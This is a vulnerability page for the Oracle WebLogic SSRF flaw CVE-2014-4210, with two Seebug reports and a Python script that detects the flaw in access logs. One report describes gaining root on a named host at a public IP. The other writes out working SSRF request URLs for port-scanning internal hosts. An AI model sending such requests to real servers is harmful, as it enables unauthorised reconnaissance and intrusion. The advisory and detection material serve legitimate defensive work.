CVE-2014-4210 - Remote Security vulnerability in Oracle WebLogic Server

047910
CVSS 5.0 - MEDIUM

Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: NONE
Availability impact: NONE

Tags: network, low complexity, oracle

Summary

Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.

Vulnerable Configurations

| Part | Description | Count |
| --- | --- | --- |
| Application | Oracle | 2 |

Seebug

  • bulletinFamily: exploit
    description:

    ### Brief description:
    1. SSRF internal-network information sniffing; 2. Java deserialization command execution: obtaining system privileges.

    ### Details:
    Yonyou (用友) private cloud operations center http://219.232.202.154:8080/#/home

    ![1.png](https://images.seebug.org/upload/201512/10005828b7d30e5f06178972c3e212e8a414e3ed.png)

    The deployed WebLogic:

    ![2.png](https://images.seebug.org/upload/201512/10005902570fd3b893016d8ba2b1ab0ca064eebc.png)

    ### Proof of vulnerability:
    1. SSRF. The default search page exists:

    ![3.png](https://images.seebug.org/upload/201512/100059475f15a213edd5375e9d3edb59bddeb8d7.png)

    Combined with http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html, testing with localhost as an example:

    ![4.png](https://images.seebug.org/upload/201512/100100050e1ee5726adaa9306ded55aebe3b529d.png)

    2. Java deserialization command execution. Test EXP:

    ![5.png](https://images.seebug.org/upload/201512/10010027324f796189765a9f89ad8122f2229421.png)

    Reverse shell obtained successfully:

    ![6.png](https://images.seebug.org/upload/201512/1001010279f70e341cb0f3945498b67b1016c1eb.png)

    root privileges; the system has been fully compromised:

    ![7.png](https://images.seebug.org/upload/201512/10010122c5f584ba2bf73fb318109ae518527c9c.png)

    This test did not cause any malicious damage to the system.
    id: SSV:93386
    last seen: 2017-11-19
    modified: 2015-12-10
    published: 2015-12-10
    reporter: Root
    title: Vulnerability in a Yonyou (用友) system (SSRF & Java deserialization command execution vulnerability)
  • bulletinFamily: exploit
    description:

    **CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jsp**

    Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6

    Oracle WebLogic web server is often both (a) externally accessible; and (b) permitted to invoke connections to internal hosts. The SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to cause the WebLogic web server to connect to an arbitrary TCP port of an arbitrary host. Responses returned are fairly verbose and can be used to infer whether a service is listening on the port specified.

    Below is an example request to an internal host which is not listening on TCP port 23:

    ```
    https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
    ```

    Response snippet:

    ```
    weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused
    ```

    Below is an example request to a host which is listening on TCP port 22:

    ```
    https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
    ```

    Response snippet:

    ```
    weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.
    ```

    It is possible to abuse this functionality to discover and port scan any host that the WebLogic server can access. In the event that a discovered service returns a valid SOAP response, it may be possible to view the contents of the response.

    SSRF vulnerabilities offer a world of possibilities – for example, this could be used to scan for services and resources present on the WebLogic server’s loopback interface, to port scan hosts adjacent to the WebLogic server, or to profile outgoing firewall rules (e.g. port scan an external attacker-controlled server to see which outgoing connections are permitted).
    id: SSV:89312
    last seen: 2017-11-19
    modified: 2015-09-06
    published: 2015-09-06
    reporter: qingxp9
    title: Oracle WebLogic SSRF And XSS
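The request shape in the advisory above (a `GET` to `/uddiexplorer/SearchPublicRegistries.jsp` whose `operator` parameter carries an attacker-chosen `host:port`) is easy to spot in access logs. The script below is an added defender-side example, not code from either Seebug entry or from the GDS advisory: it parses WebLogic-style common-log-format lines (the sample lines are constructed), extracts the `operator` value from requests to that page, and flags any that point at a loopback, private, link-local or reserved address, at a host outside an assumed allowlist (`uddi.example.com` is a placeholder for whatever registries a deployment legitimately queries), or at a non-standard port on an allowed host. The same `classify_operator` check can serve as the allowlist validation a front-end proxy or WAF would apply before the request reaches WebLogic.

```python
"""Detection helper for CVE-2014-4210-style SSRF probes against
/uddiexplorer/SearchPublicRegistries.jsp.

Added example, not part of the advisory. Assumes WebLogic HTTP access
logs in common log format; the sample lines below are constructed.
"""
import ipaddress
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (common log format); client
# addresses, timestamps and the operator targets are illustrative only.
SAMPLE_LOG = """\
203.0.113.10 - - [06/Sep/2015:10:00:01 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F10.0.0.4%3A22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1" 200 1843
203.0.113.10 - - [06/Sep/2015:10:00:02 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F127.0.0.1%3A7001&rdoSearch=name&txtSearchname=a&btnSubmit=Search HTTP/1.1" 200 1790
198.51.100.7 - - [06/Sep/2015:10:00:03 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2Fuddi.example.com%2Fuddi%2Finquiry&rdoSearch=name&txtSearchname=acme&btnSubmit=Search HTTP/1.1" 200 2210
198.51.100.7 - - [06/Sep/2015:10:00:04 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3100
"""

# client ident user [timestamp] "METHOD target PROTOCOL" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

UDDI_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"

# Assumed allowlist (placeholder): the public UDDI registries this
# deployment is expected to query. Anything else is suspicious.
ALLOWED_OPERATOR_HOSTS = {"uddi.example.com"}


def classify_operator(operator):
    """Return a reason string if the operator URL looks like an SSRF probe, else None."""
    try:
        target = urlparse(operator)
        port = target.port  # raises ValueError on a malformed port
    except ValueError:
        return "unparseable operator URL"
    if target.scheme not in ("http", "https"):
        return "non-HTTP scheme"
    host = target.hostname
    if not host:
        return "missing host"
    # Literal IP addresses: refuse anything that is not globally routable.
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None
    if addr is not None and (addr.is_private or addr.is_loopback
                             or addr.is_link_local or addr.is_reserved):
        return "operator points at internal address " + host
    if host not in ALLOWED_OPERATOR_HOSTS:
        return "operator host not on allowlist: " + host
    # An allowed host on an unexpected port is still a port-probe pattern.
    if port not in (None, 80, 443):
        return "non-standard port %d on operator host" % port
    return None


def scan_access_log(text):
    """Parse log lines; return (client, timestamp, reason) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parsed = urlparse(m.group("target"))
        if parsed.path != UDDI_PATH:
            continue
        # parse_qs percent-decodes the values, so http%3A%2F%2F... becomes http://...
        params = parse_qs(parsed.query)
        for operator in params.get("operator", []):
            reason = classify_operator(operator)
            if reason:
                findings.append((m.group("client"), m.group("ts"), reason))
    return findings


if __name__ == "__main__":
    for client, ts, reason in scan_access_log(SAMPLE_LOG):
        print("%s [%s] %s" % (client, ts, reason))
```

Run over the constructed sample, the two requests from `203.0.113.10` are reported (one aimed at `10.0.0.4:22`, one at the loopback interface) while the request to the allowlisted registry and the unrelated console request are ignored. In production the same allowlist check belongs in front of the page itself; the log scan is for finding past probes once the patch from the relevant Oracle Critical Patch Update has been applied.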